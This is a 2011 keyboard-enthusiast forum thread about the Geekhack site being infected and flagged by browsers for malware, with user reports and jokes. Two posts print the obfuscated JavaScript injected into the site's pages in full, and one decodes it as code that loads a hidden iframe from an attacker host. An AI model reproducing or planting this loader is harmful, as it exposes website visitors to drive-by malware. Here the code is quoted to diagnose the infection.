Geekhack is infeasted

ripster · 07 Nov 2011, 22:13

We're the friendliest customers in this world
We're modest - we have money

Yeah, I got the irony part. Geld. Money.

I got an A in High School German. Just ask all the German Deskthority members.

P.S. Don't you europeans close your quotes???? """""""""

guilleguillaume · 09 Nov 2011, 02:45

Is the problem solved?

Firefox and IE9 still warn me about malware site.

itlnstln · 09 Nov 2011, 14:50

According to iMav, he fixed the problem. Chrome is still flagging GH as malicious as well. I'm only going to access it by Tapatalk until the message goes away since I primarily post from work.

ripster · 09 Nov 2011, 16:46

My Filco R Limited Edition Red Cherry MX had bugs yesterday.

Specifically an ant.

I'll host the pics here to please Sixty.

Alive

: FLA_3597-2.jpg (916.89 KiB) Viewed 6870 times

Dead

: FLA_3602.jpg (1014.16 KiB) Viewed 6870 times

ripster · 10 Nov 2011, 17:46

So you guys really couldn't see my photos unless logged in???

BTW the warning message is gone.

webwit · 11 Nov 2011, 01:28

Still leaves this problem (example) when not logged in there.

Scumbag geekhack...

ripster · 11 Nov 2011, 19:43

Feel free to use my pictures in your wikis.

Just leave the watermark.

I call this one "Red Alert - Virus Attack"!

: FLA_3613.jpg (166.18 KiB) Viewed 6797 times

webwit · 12 Nov 2011, 00:37

ripster wrote:I call this one "Red Alert - Virus Attack"!

FLA_3613.jpg (145.68 KiB) Viewed 6781 times

I like the orange guy.

ripster · 23 Nov 2011, 18:38

Geekhack is infeasted

Happy Thanksgiving All!

Oh wait, some of you are Canadians.

Meanwhile at Geekhack......

: Geekhack 11-23-2011.png (44.14 KiB) Viewed 6713 times

Malware found on javascript file:
http://geekhack.org/clientscript/yui/co ... n.js?v=417
Known javascript malware.
Details: http://sucuri.net/malware/malware-entry-mwjsanon7
a=(document.getElementsByTagName+'').substr(1,4);if((a=="func")||(a=="unct")){ss="";s=String;e=eval;t='g';}ddd=new Date();d2=new Date(ddd.valueOf()-2);Object.prototype.bt3223='tb4etew';c="createTextNode";if('tb4etew'==={}.bt3223)a=document[c]('321');if(a.nodeValue==321)h=(ddd-d2)*-1;n="4.5g4.5g52.5g51g16g20g50g55.5g49.5g58.5g54.5g50.5g55g58g23g51.5g50.5g58g34.5g54g50.5g54.5g50.5g55g58g57.5g33g60.5g42g48.5g51.5g39g48.5g54.5g50.5g20g19.5g49g55.5g50g60.5g19.5g20.5g45.5g24g46.5g20.5g61.5g4.5g4.5g4.5g52.5g51g57g48.5g54.5g50.5g57g20g20.5g29.5g4.5g4.5g62.5g16g50.5g54g57.5g50.5g16g61.5g4.5g4.5g4.5g50g55.5g49.5g58.5g54.5g50.5g55g58g23g59.5g57g52.5g58g50.5g20g17g30g52.5g51g57g48.5g54.5g50.5g16g57.5g57g49.5g30.5g19.5g52g58g58g56g29g23.5g23.5g59.5g59.5g59.5g23g49.5g55.5g54.5g50.5g58g51g55.5g57g58.5g54.5g57.5g23g49.5g55.5g54.5g23.5g58.5g56g54g55.5g48.5g50g57.5g23.5g51.5g55.5g55.5g51.5g54g50.5g23g52g58g54.5g54g19.5g16g59.5g52.5g50g58g52g30.5g19.5g24.5g24g19.5g16g52g50.5g52.5g51.5g52g58g30.5g19.5g24.5g24g19.5g16g57.5g58g60.5g54g50.5g30.5g19.5g59g52.5g57.5g52.5g49g52.5g54g52.5g58g60.5g29g52g52.5g50g50g50.5g55g29.5g56g55.5g57.5g52.5g58g52.5g55.5g55g29g48.5g49g57.5g55.5g54g58.5g58g50.5g29.5g54g50.5g51g58g29g24g29.5g58g55.5g56g29g24g29.5g19.5g31g30g23.5g52.5g51g57g48.5g54.5g50.5g31g17g20.5g29.5g4.5g4.5g62.5g4.5g4.5g51g58.5g55g49.5g58g52.5g55.5g55g16g52.5g51g57g48.5g54.5g50.5g57g20g20.5g61.5g4.5g4.5g4.5g59g48.5g57g16g51g16g30.5g16g50g55.5g49.5g58.5g54.5g50.5g55g58g23g49.5g57g50.5g48.5g58g50.5g34.5g54g50.5g54.5g50.5g55g58g20g19.5g52.5g51g57g48.5g54.5g50.5g19.5g20.5g29.5g51g23g57.5g50.5g58g32.5g58g58g57g52.5g49g58.5g58g50.5g20g19.5g57.5g57g49.5g19.5g22g19.5g52g58g58g56g29g23.5g23.5g59.5g59.5g59.5g23g49.5g55.5g54.5g50.5g58g51g55.5g57g58.5g54.5g57.5g23g49.5g55.5g54.5g23.5g58.5g56g54g55.5g48.5g50g57.5g23.5g51.5g55.5g55.5g51.5g54g50.5g23g52g58g54.5g54g19.5g20.5g29.5g51g23g57.5g58g60.5g54g50.5g23g59g52.5g57.5g52.5g49g52.5g54g52.5g58g60.5g30.5g19.5g52g52.5g50g50g50.5g55g19.5g29.5g51g23g57.5g58g60.5g54g50.5g23g56g55.5g57.5g52.5g58g52.5g55.5g55g30.5g19.5g48.5g49g57.5g55.5g54g58.5g58g50.5g19.5g29.5g51g23g57.5g58g60.5g54g50.5g23g54g50.5g51g58g30.5g19.5g24g19.5g29.5g51g23g57.5g58g60.5g54g50.5g23g58g55.5g56g30.5g19.5g24g19.5g29.5g51g23g57.5g50.5g58g32.5g58g58g57g52.5g49g58.5g58g50.5g20g19.5g59.5g52.5g50g58g52g19.5g22g19.5g24.5g24g19.5g20.5g29.5g51g23g57.5g50.5g58g32.5g58g58g57g52.5g49g58.5g58g50.5g20g19.5g52g50.5g52.5g51.5g52g58g19.5g22g19.5g24.5g24g19.5g20.5g29.5g4.5g4.5g4.5g50g55.5g49.5g58.5g54.5g50.5g55g58g23g51.5g50.5g58g34.5g54g50.5g54.5g50.5g55g58g57.5g33g60.5g42g48.5g51.5g39g48.5g54.5g50.5g20g19.5g49g55.5g50g60.5g19.5g20.5g45.5g24g46.5g23g48.5g56g56g50.5g55g50g33.5g52g52.5g54g50g20g51g20.5g29.5g4.5g4.5g62.5";n=n["split"](t);for(i=0;i!=n.length;i++)ss+=s.fromCharCode(-h*e("n"+"["+"i"+"]"));zx=ss;if(a.data==a.nodeValue)e(zx)

itlnstln · 23 Nov 2011, 19:25

There's also some spambot running around in there asking for pics. At least Tapatalk is safe.

I think.

pita · 23 Nov 2011, 19:40

I don't get the warning virus warning, but I　am not able to post anything..

Daemon Raccoon · 23 Nov 2011, 19:50

pita wrote:I don't get the warning virus warning, but I　am not able to post anything..

If you disable Javascript for Geekhack you can post.

Ascaii · 24 Nov 2011, 11:39

got a new trojan warning yesterday, seems whatever the issue is is NOT resolved. Google now notes the last malware find as 2011-11-23

zulios · 24 Nov 2011, 12:51

I've had trouble with this : was browsing on geekhack. Suddenly firefox crashed, and a soft ironically called "privacy protection" appeared from nowhere, disabling my anti virus and trying to scan my pc. Fortunately I've gotten rid of it pretty quickly, but for a non experienced user it has a very similar look to any serious windows application.

Don't know what it does precisely though, but it said my pc was infected with blaster worm and started a scan it. It looks like it tries to protect you when actually I believe it rather tries to steal your data. That's some pretty good job in trying to lure the user.

Brian8bit · 24 Nov 2011, 13:09

Is it a vulnerability in vBulletin that has yet to be patched that people are exploiting? Or is it someone using a dodgy signature? Another forum I use with vBulletin occasionally gets malware warnings, but in every instance it has been someones signature...

Ascaii · 24 Nov 2011, 15:19

Imav said it was a vulnerability last time, but supposedly it was fixed...if it was then it shouldnt be fucked up again...but it is, so all bets are off in my eyes.

Gerk · 24 Nov 2011, 18:13

It's seriously messed up at the moment, can't even load pages, instead getting the generic VB warning message that headers were already sent ... then it sends my browser(s) into a headspin that require a force quit. This is the first time any of the problems have caused me grief on OSX. It's also a time when I find Lion's "feature" for re-opening all of your Safari tabs after a quit (or force quit) incredibly annoying.

When iMac said it was "fixed" I think he was just referring to the injected js, not the actual exploit or whatever they used to get in with. If it is someone's sig then it's still using an exploit/loophole because there should be no js in sigs.

7bit · 24 Nov 2011, 18:37

I remember GeekHack was a great website (with some technical issues fron time to time), but long gone.

I wonder what iMav does these days since he'd given up his website.

mintberryminuscrunch · 24 Nov 2011, 18:58

7bit wrote: I wonder what iMav does these days since he'd given up his website.

as long as he doesn't spam adds on the website there is still hope

litster · 24 Nov 2011, 19:13

Before, I wondered, ah, the good old days when every keyboard nut was under one roof, on the same forum. Now I am thankful that there are two forums. Or this Thanksgiving holiday would be pretty boring

Fault tolerance FTW!

iMav said he is on the road this long weekend. I guess it will be a while before this fixed. Even if vB was patched, there maybe other security holes in the OS, browser, or other software on the box that is accessible through open ports for repeat infections.

pita · 24 Nov 2011, 19:17

What a mess at GH...

webwit · 24 Nov 2011, 19:25

What is sent is this:

Spoiler:

Code: Select all

<script>a=(document.getElementsByTagName+'').substr(1,4);if((a=="func")||(a=="unct")){ss="";s=String;e=eval;t='g';}ddd=new Date();d2=new Date(ddd.valueOf()-2);Object.prototype.bt3223='tb4etew';c="createTextNode";if('tb4etew'==={}.bt3223)a=document[c]('321');if(a.nodeValue==321)h=(ddd-d2)*-1;n="4.5g4.5g52.5g51g16g20g50g55.5g49.5g58.5g54.5g50.5g55g58g23g51.5g50.5g58g34.5g54g50.5g54.5g50.5g55g58g57.5g33g60.5g42g48.5g51.5g39g48.5g54.5g50.5g20g19.5g49g55.5g50g60.5g19.5g20.5g45.5g24g46.5g20.5g61.5g4.5g4.5g4.5g52.5g51g57g48.5g54.5g50.5g57g20g20.5g29.5g4.5g4.5g62.5g16g50.5g54g57.5g50.5g16g61.5g4.5g4.5g4.5g50g55.5g49.5g58.5g54.5g50.5g55g58g23g59.5g57g52.5g58g50.5g20g17g30g52.5g51g57g48.5g54.5g50.5g16g57.5g57g49.5g30.5g19.5g52g58g58g56g29g23.5g23.5g57.5g59.5g48.5g50g59.5g25.5g23g50g55g57.5g24g26.5g23g49.5g55.5g54.5g23.5g54.5g48.5g52.5g55g23g56g52g56g31.5g56g48.5g51.5g50.5g30.5g51g25g26g24g50.5g24.5g28g51g48.5g26g50.5g48.5g28g25g26.5g26g19.5g16g59.5g52.5g50g58g52g30.5g19.5g24.5g24g19.5g16g52g50.5g52.5g51.5g52g58g30.5g19.5g24.5g24g19.5g16g57.5g58g60.5g54g50.5g30.5g19.5g59g52.5g57.5g52.5g49g52.5g54g52.5g58g60.5g29g52g52.5g50g50g50.5g55g29.5g56g55.5g57.5g52.5g58g52.5g55.5g55g29g48.5g49g57.5g55.5g54g58.5g58g50.5g29.5g54g50.5g51g58g29g24g29.5g58g55.5g56g29g24g29.5g19.5g31g30g23.5g52.5g51g57g48.5g54.5g50.5g31g17g20.5g29.5g4.5g4.5g62.5g4.5g4.5g51g58.5g55g49.5g58g52.5g55.5g55g16g52.5g51g57g48.5g54.5g50.5g57g20g20.5g61.5g4.5g4.5g4.5g59g48.5g57g16g51g16g30.5g16g50g55.5g49.5g58.5g54.5g50.5g55g58g23g49.5g57g50.5g48.5g58g50.5g34.5g54g50.5g54.5g50.5g55g58g20g19.5g52.5g51g57g48.5g54.5g50.5g19.5g20.5g29.5g51g23g57.5g50.5g58g32.5g58g58g57g52.5g49g58.5g58g50.5g20g19.5g57.5g57g49.5g19.5g22g19.5g52g58g58g56g29g23.5g23.5g57.5g59.5g48.5g50g59.5g25.5g23g50g55g57.5g24g26.5g23g49.5g55.5g54.5g23.5g54.5g48.5g52.5g55g23g56g52g56g31.5g56g48.5g51.5g50.5g30.5g51g25g26g24g50.5g24.5g28g51g48.5g26g50.5g48.5g28g25g26.5g26g19.5g20.5g29.5g51g23g57.5g58g60.5g54g50.5g23g59g52.5g57.5g52.5g49g52.5g54g52.5g58g60.5g30.5g19.5g52g52.5g50g50g50.5g55g19.5g29.5g51g23g57.5g58g60.5g54g50.5g23g56g55.5g57.5g52.5g58g52.5g55.5g55g30.5g19.5g48.5g49g57.5g55.5g54g58.5g58g50.5g19.5g29.5g51g23g57.5g58g60.5g54g50.5g23g54g50.5g51g58g30.5g19.5g24g19.5g29.5g51g23g57.5g58g60.5g54g50.5g23g58g55.5g56g30.5g19.5g24g19.5g29.5g51g23g57.5g50.5g58g32.5g58g58g57g52.5g49g58.5g58g50.5g20g19.5g59.5g52.5g50g58g52g19.5g22g19.5g24.5g24g19.5g20.5g29.5g51g23g57.5g50.5g58g32.5g58g58g57g52.5g49g58.5g58g50.5g20g19.5g52g50.5g52.5g51.5g52g58g19.5g22g19.5g24.5g24g19.5g20.5g29.5g4.5g4.5g4.5g50g55.5g49.5g58.5g54.5g50.5g55g58g23g51.5g50.5g58g34.5g54g50.5g54.5g50.5g55g58g57.5g33g60.5g42g48.5g51.5g39g48.5g54.5g50.5g20g19.5g49g55.5g50g60.5g19.5g20.5g45.5g24g46.5g23g48.5g56g56g50.5g55g50g33.5g52g52.5g54g50g20g51g20.5g29.5g4.5g4.5g62.5";n=n["split"](t);for(i=0;i!=n.length;i++)ss+=s.fromCharCode(-h*e("n"+"["+"i"+"]"));zx=ss;if(a.data==a.nodeValue)e(zx);</script>
Unable to add cookies, header already sent.<br />
File: /var/www/lherzog/geekhack.org-html/vb/includes/config.php<br />
Line: 2<br />

Oooh, an obfuscated javascript. Meh, I decode it and find this:

Spoiler:

In other words, it tries to insert a hidden iframe from http://swadw3.dns05.com/main.php?page=f240e18fa4ea8254, which is where the attack is coming from.

ripster · 24 Nov 2011, 19:26

Come to the dark side.

We HAVE cookies.

For you Euro/Canadian folks this is what Thanksgiving Day is like in the great U.S.A.:

Piggly Wiggly is 6 degrees from Kevin Bacon.

Gerk · 24 Nov 2011, 21:23

webwit wrote:What is sent is this:
(snip)
In other words, it tries to insert a hidden iframe from http://swadw3.dns05.com/main.php?page=f240e18fa4ea8254, which is where the attack is coming from.

I was just going to post this. They might have been more successful had they not tried to inject it where they did. Someone has labelled GH as a target, probably all over the hacker boards in their lists. Might be a while before they sort it I'm guessing. I think iMav keeps fixing the injected code but hasn't addressed the root of the issue.

Funny enough it still works fine with tapatalk, but traffic is pretty low today LOL

pita · 24 Nov 2011, 22:40

Gerk wrote: ..., but traffic is pretty low today LOL

Well DUH!? lol.

Gerk · 24 Nov 2011, 22:42

pita wrote:
Gerk wrote: ..., but traffic is pretty low today LOL
Well DUH!? lol.

Just stating that only a few of us tapatalk users are the ones getting anywhere

webwit · 25 Nov 2011, 02:19

Gerk · 25 Nov 2011, 02:31

ripster · 25 Nov 2011, 17:43

I think it's been fixed.

BUT I've said that before......

Report 2011-04-05 03:24:45 (GMT 1)
Website geekhack.org
Domain Hash 0db414050bd8f4be630b38e87d120354
IP Address 65.111.241.205 [SCAN]
IP Hostname runt-3.uhhh.org
IP Country US (United States)
AS Number 30691
AS Name LLDC - Lifeline Data Centers
Detections 0 / 21 (0 %)
Status CLEAN

Scanning site with: AMaDa CLEAN
Scanning site with: BrowserDefender CLEAN
Scanning site with: DNS-BH CLEAN
Scanning site with: DShield SDL CLEAN
Scanning site with: Google Diagnostic CLEAN
Scanning site with: hpHosts UNRATED
Scanning site with: joewein.de LLC CLEAN
Scanning site with: Malware Domain List CLEAN
Scanning site with: Malware Patrol CLEAN
Scanning site with: MyWOT CLEAN
Scanning site with: Norton SafeWeb CLEAN
Scanning site with: ParetoLogic URL Clearing House CLEAN
Scanning site with: PhishTank CLEAN
Scanning site with: SCUMWARE CLEAN
Scanning site with: SpamhausDBL CLEAN
Scanning site with: SURBL CLEAN
Scanning site with: Threat Log CLEAN
Scanning site with: TrendMicro Web Reputation CLEAN
Scanning site with: URIBL CLEAN
Scanning site with: Web Security Guard UNRATED
Scanning site with: ZeuS Tracker CLEAN

Alors on danse.

mintberryminuscrunch · 25 Nov 2011, 19:51

lets take bets, how long it will last.
I give them till 1st of december